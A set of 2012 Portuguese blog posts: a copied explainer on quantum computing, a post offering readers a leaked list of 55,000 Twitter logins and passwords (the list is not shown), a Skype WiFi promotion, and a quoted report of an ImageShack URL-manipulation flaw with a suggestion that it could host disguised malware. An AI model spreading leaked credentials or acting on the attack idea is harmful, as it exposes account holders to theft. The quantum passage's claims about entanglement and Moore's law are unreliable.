Por outro lado, os bits quânticos (ou qbits) utilizam um princípio quântico conhecido como superposição para armazenar informações. A superposição é uma lei da mecânica quântica que diz: em qualquer sistema quântico em que haja uma quantidade observável que possua dois ou mais valores (no caso 0 e 1 ou verdadeiro ou falso) ocorre uma sobreposição dos estados possíveis, ou seja, de seus valores. Isso implica que o qbit possui simultaneamente os valores 0 e 1 e uma sobreposição destes dois valores, o que significa que qbit possui infinitos valores ou estados possíveis devido à superposição destes. Graças a essa propriedade dos qbits, eles podem realizar muitos cálculos de uma vez, pois ocorre a sobreposição dos cálculos que acontecem simultaneamente.
Os bits clássicos utilizam cargas elétricas para armazenar informação em chips, já os qbits são moléculas ou partículas como elétrons. A vantagem é que os elétrons, por exemplo, possuem uma sobreposição de dois valores de spin (giro das partículas), "para baixo" e "para cima" (os valores de spin funcionam como os valores binários 0 e 1) e giram em velocidades próximas às da luz. Então, após aprisionar os elétrons, os cientistas podem utilizar o spin dos mesmos para guardar informações. Isso cria uma capacidade de armazenamento de informações enorme, já que em poucos centímetros cúbicos existem milhões de elétrons, cada um atuando como um qbit.
Esse é o fundamento básico dos computadores quânticos. Utilizar moléculas e partículas como bits, substituindo valores booleanos como 0 e 1 pelo spin. Outras teorias quânticas, como o emaranhamento quântico, tornam muito maior o número de partículas controláveis. Essa teoria diz que em nível quântico, próximo à escala de Planck, todos os objetos estão intimamente ligados. Isso na computação quântica implica que duas partículas, elétrons no caso, quando criadas conjuntamente, possuem uma ligação graças ao emaranhamento quântico e isso faz com que, por exemplo, quando o spin de uma é alterado, o spin da outra partícula seja instantaneamente alterado, mesmo que separadas por milhões de quilômetros.
A Lei de Moore afirma que a cada 18 meses a velocidade dos processadores existentes dobra. Essa lei mostrou-se verdadeira desde 1965 e estima-se que continue assim até 2015. Caso essa lei prevaleça, até meados de 2030 podemos esperar computadores quânticos pessoais. 
Fonte: http://www.oficinadanet.com.br/artigo/ciencia/a_revolucao_da_computacao_quantica

Vocês agora sabendo a base da computação quântica fica mais fácil para vocês entenderem, irei colocar abaixo um link de um site que é atualizado constantemente, que achei por um "acaso" procurando no Google sobre computação quântica.
Link: http://www.inovacaotecnologica.com.br/noticias/meta.php?meta=Computa%E7%E3o%20Qu%E2ntica

Espero ter aberto mais a visão de vocês para o mundo quântico.

Abraço!

quarta-feira, 9 de maio de 2012

55.000 Contas do Twitter Expostas

Navegando pela manhã me deparei com uma notícia preocupante para os usuários do Twitter.Foram expostas num total de 55.000 contas (isso mesmo, login e senha) de usuários e parece que há famosos nessa lista vazada, a autoria dessa exposição foi o grupo anonymous, pensando aqui comigo, o que eles ganham fazendo essas coisas? Há uma mente visando algo maior por trás disso?
Estou disponibilizando para vocês a lista de users e passwords, para verificarem se o de vocês, da namorada, do papagaio, da sogra, etc. estão relacionados.

terça-feira, 8 de maio de 2012

Skype com Internet de Graça no Dia das Mães


Olha que notícia boa: neste Dia das Mães, a Skype está oferecendo a todos os usuários no Brasil uma hora de Skype WiFi grátis em mais de 2.300 hotspots localizados em aeroportos, shopping centers, cafés e hotéis em todo o país. A oferta vale a partir da 0h01 do sábado, 12 de maio de 2012 (horário de Brasília), até as 23h59 do domingo, dia 13 de maio (horário de Brasília).
Com acesso grátis ao Skype WiFi, você poderá navegar pela Internet, checar seus e-mails, atualizar seu status na sua rede social favorita, e também fazer chamadas grátis com voz e vídeo de Skype para Skype, em qualquer lugar onde haja uma rede compatível com o Skype WiFi. Você pode até pedir a opinião dos seus amigos ou dos seus irmãos via uma chamada com vídeo enquanto compra o presente dela. E o mais importante: se você estiver longe da sua mãe, pode fazer uma surpresa pra ela com uma chamada com vídeo, de onde estiver.
Usar o Skype WiFi é muito fácil. Certifique-se de que você tenha a versão mais recente do Skype no seu PC ou Mac, ou a versão mais recente do Skype WiFi no seu dispositivo iOS (iPhone, iPod touch ou iPad). Depois disso, é só você se conectar ao hotspot usando as configurações do seu dispositivo e seguir as instruções.
Para baixar a lista de hotspots que você pode usar com o Skype WiFi, clique aqui.
Aproveite, e feliz Dia das Mães!
[fonte: Skype]
Verifiquei a disponibilidade aqui em São José do Rio Preto e tem alguns lugares interessantes, pensei que não iria ter em nenhum lugar (tá um pouco de preconceito!), pelo motivo de muitas pessoas nunca ouviram falar da cidade, bom isso não vem em questão, façam um bom proveito da "Uma hora" de internet 'free'.

ImageShack ou ImageHack??

Vasculhando meus e-mails do Gmail, do qual tenho atrelado aos dois grupos que um colega me indicou, reparei num título interessante da postagem da qual dizia:"ImageShack 0day obstrução de URL sem verificação"
Estava na faculdade nessa hora e comecei a ler a explicação do e-mail que veio assim:



"Eu fico me perguntando, até onde vai parar a burrice humana? E eu consegui a resposta hoje:
Vai parar lá na puta que pariu...
Um exemplo disso é o ImagesHack ou ImagesShack como preferir, um dos maiores sites para upload de imagens, com uma falha tão burra, tão estúpida, que até estou com vergonha de reporta-la.
Mas enfim informação é conhecimento, e o negócio é tão fácil que nem vo gastar muito texto explicando...

Bom upa alguma imagem lá, pega a URL e OLHA PRA ELA! Viu? Bom, algumas pessoas ja podem ter percebido a vuln, se você não percebeu é porque você está com sono ou apaixonado...

Você vai ter algo parecido com isso:

Bem vejamos, o l mostra diz ao servidor qual a imagem, e o page diz qual a pagina do servidor, a pagina imprime a imagem para você ou mais ou menos isso...
O negócio é o seguinte, como várias outras vulnerabilidades isso acontece sem nenhuma autenticação, ou processo que verifica se você é quem realmente é. Então é só pegar um link de uma imagem, como por ex:

Pegar essa informação:

img502/900/myalbum.swf

e colocar no primeiro link assim:


Pronto, você tem a permissão.

Data de descoberta: 06/05/2012 Hora: 2:44:22
Gr33tz pela descoberta: 67pc
Gr33tz pelo Exploit: D4RKCR1PT3R
Gr33tz pela idéia de excluir a página: Mark Adams"

Legal, aí vem a pergunta: Raphael, mas o que essa vulnerabilidade quer dizer?
Bom você conseguindo alterar o final do link e ele não pedindo nenhuma verificação para tal mudança, podemos hospedar um arquivo executável camuflado e disseminar para roubar informações, capturar pc's, etc...
Agora uma recomendação, só abram link do imageshack se tiverem a real certeza do que é o conteúdo.